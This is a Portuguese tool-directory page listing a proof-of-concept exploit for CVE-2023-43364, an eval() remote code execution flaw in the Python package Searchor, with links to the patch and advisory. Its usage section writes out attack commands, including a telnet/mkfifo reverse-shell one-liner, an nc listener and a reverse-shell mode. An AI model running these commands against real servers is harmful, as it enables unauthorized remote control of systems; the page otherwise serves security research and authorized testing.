Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — Exploit POC via uso inseguro de `eval()` no Searchor (< 2.4.2) | Kitploit
Ferramentas/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

Exploit POC via uso inseguro de `eval()` no Searchor (< 2.4.2)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 2 mesesAinda não revisado
Compartilhar

CVE-2023-43364 – Exploit de RCE do Searchor (PoC)

Execução Remota de Código (RCE) por meio do uso inseguro de eval() no Searchor (< 2.4.2)

Visão Geral

Este projeto demonstra a exploração de CVE-2023-43364, uma vulnerabilidade de Execução Remota de Código (RCE) que afeta o pacote Python Searchor (< 2.4.2).

O problema é causado pelo uso inseguro de eval() em entrada controlada pelo usuário, permitindo que atacantes injetem e executem código Python arbitrário.

A vulnerabilidade foi corrigida com a remoção do uso inseguro de eval(), conforme mostrado no patch oficial:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

Detalhes técnicos adicionais e aviso:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

Esta prova de conceito fornece múltiplos métodos de execução, incluindo execução de comandos, validação de teste e shells reversas.

Uso

Teste de RCE

Execute um comando simples (id) para verificar a execução de código:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

Executar Comando Personalizado

Execute qualquer comando no servidor alvo:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

Exemplos:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

Shell Reversa

Inicie um listener na sua máquina:

root@kitploit:~
nc -lvnp 4444

Execute o exploit:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ Isenção de Responsabilidade

Este projeto destina-se a:

  • fins educacionais
  • pesquisa de segurança
  • apenas testes de penetração autorizados

O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.

Use este exploit apenas em ambientes controlados ou em sistemas para os quais você tenha permissão explícita para testar

Baixar ferramenta